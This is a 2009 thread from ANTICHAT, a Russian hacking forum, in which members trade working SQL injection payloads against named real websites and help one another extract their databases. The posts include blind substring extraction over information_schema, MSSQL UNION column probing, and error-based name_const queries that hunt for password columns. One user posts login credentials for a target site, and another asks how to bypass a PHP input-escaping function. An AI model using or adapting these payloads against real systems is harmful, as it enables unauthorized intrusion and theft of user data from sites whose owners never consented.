ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.09.2009, 17:28
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от warlok
а как в таком случае правильно выводить данные ? т.е. как мне узнать какому символу соответсвует запрос ?
http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((sel ect+table_name+from+information_schema.tables+limi t+1+offset+ n)+from+1+ for+1))>1
n=0 – первая таблица
n=1 – вторая таблица
n=2 – третья таблица и тд
http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((sel ect+table_name+from+information_schema.tables+limi t+1+offset+1)+from+ n+ for+1))>1
n=1 – первый символ
n=2 – второй символ
n=3 – третий символ и тд
Автоматизируй процесс – накатай скрипт. Или уже готовый заюзай, тут где-то недалеко лежал
ЗЫ базу задротов тебе врятле удастся достать – л2 сервер работает под mssql (если не джава) и как правило доступ к табличкам пользователей имеет только сервер авторизации (или как там он называется не помню уже …). Хотя всякое бывает
|
|
|
26.09.2009, 18:19
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от S00pY
только толку от него
http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1,if(substring(version(),1,1)=5,1,(select+colu mn_name+from+information_schema.columns))
ну и соответственно далее как обычно
http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1,if(ASCII(SUBSTRING((SELECT+table_name+FROM+i nformation_schema.tables+LIMIT+16,1),1,1))<102,1,( select+column_name+from+information_schema.columns ))
============================
|
|
|
|
26.09.2009, 18:23
|
|
Новичок
Регистрация: 25.09.2009
Сообщений: 2
Провел на форуме:
4366
Репутация:
0
|
|
Помогите разобраться с MSSQL injection
Имеем:
SQL
?id=496'
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME+FROM+INF ORMATION_SCHEMA.TABLES--
Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,1+FROM+I NFORMATION_SCHEMA.TABLES--
Microsoft OLE DB Provider for SQL Server error '80040e07'
Operand type clash: ntext is incompatible with int
SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a'+FROM +INFORMATION_SCHEMA.TABLES--
Microsoft OLE DB Provider for SQL Server error '80040e14'
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
добавляем поля пока эта ошибка не пропадет...
SQL
?id=496+UNION+ALL+SELECT+TOP+1+TABLE_NAME,'a',1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+INFORMATIO N_SCHEMA.TABLES--
ошибок не дает, но и ничего и не выводит
Подскажите пожалуйста куда дальше рыть, или может я уже где-то туплю?
|
|
|
|
26.09.2009, 18:24
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
0o
Незадумывался : (....
|
|
|
|
26.09.2009, 18:36
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
bumerok
рыть лучше вот сюда:
https://forum.antichat.ru/thread30501.html
А если нужен конкретный ответ по конкретной скуле, то давай линк, гадание на операторах и конструкциях в теме ни к чему.
|
|
|
|
26.09.2009, 20:17
|
|
Новичок
Регистрация: 25.09.2009
Сообщений: 2
Провел на форуме:
4366
Репутация:
0
|
|
jokester
вот линк
тока нужно залогинится
log: bugsrc
pas: qwer1234
http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496'
+ почему-то из ie8 http 500, a из под ff 3.0.14 нормально
выводит ошибку
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
|
|
|
|
26.09.2009, 20:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
bumerok, юзай подзапросы
http://www.zapoznanie.pl/member/events_more_frame.asp?event_id=496+or+1=(select+to p+1+table_name+from+information_schema.tables);--
|
|
|
|
26.09.2009, 20:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от jokester
more than 1 row
если ?=(select name_const((select 1),1)) true, то лучше так:
http://takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=(select+1+from+(select+*+from+(select+name_con st((select+concat_ws(0x3a,table_schema,table_name, column_name)+from+information_schema.columns+where +column_name+like+0x70617373+limit+1),1),name_cons t((select+concat_ws(0x3a,table_schema,table_name,c olumn_name)+from+information_schema.columns+where+ column_name+like+0x70617373+limit+1),1))a)b)#
|
|
|
|
27.09.2009, 15:51
|
|
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308
Репутация:
2
|
|
Привет всем! Можно ли обойти вот такую защиту?
Все параметры обрабатываются вот такой функцией:
function prov($var, $sql=true) {
$var= htmlspecialchars($var, ENT_QUOTES, "windows-1251");
if(get_magic_quotes_gpc ())
{
$var= stripslashes ($var);
}
if ($sql)
{
$var= mysql_real_escape_string ($var);
}
$var= strip_tags($var);
return $var;
}
|
|
|
|
27.09.2009, 18:59
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от peonix
Привет всем! Можно ли обойти вот такую защиту?
Все параметры обрабатываются вот такой функцией:
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
